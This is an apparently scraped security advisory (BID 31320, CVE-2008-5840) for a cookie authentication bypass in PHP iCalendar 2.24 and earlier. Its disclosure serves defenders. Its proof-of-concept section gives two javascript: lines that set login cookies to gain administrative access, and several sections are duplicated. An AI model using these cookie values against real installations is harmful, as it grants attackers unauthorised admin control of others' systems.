PHP iCalendar Cookie Authentication Bypass Vulnerability
BID:31320
Info
PHP iCalendar Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 31320 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-5840 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 22 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | Stack |
| Vulnerable: |
PHP iCalendar PHP iCalendar 2.2.1 PHP iCalendar PHP iCalendar 2.0.1 PHP iCalendar PHP iCalendar 2.0 c PHP iCalendar PHP iCalendar 2.0 b PHP iCalendar PHP iCalendar 2.0 a2 PHP iCalendar PHP iCalendar 2.24 PHP iCalendar PHP iCalendar 2.23 rc1 PHP iCalendar PHP iCalendar 2.22 PHP iCalendar PHP iCalendar 2.1 PHP iCalendar PHP iCalendar 2.0 |
| Not Vulnerable: | |
Discussion
PHP iCalendar Cookie Authentication Bypass Vulnerability
PHP iCalendar is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
This issue affects PHP iCalendar 2.24 and prior versions.
PHP iCalendar is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
This issue affects PHP iCalendar 2.24 and prior versions.
Exploit / POC
PHP iCalendar Cookie Authentication Bypass Vulnerability
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";
Solution / Fix
PHP iCalendar Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP iCalendar Cookie Authentication Bypass Vulnerability
References:
References:
- PHP iCalendar Homepage (PHP iCalendar)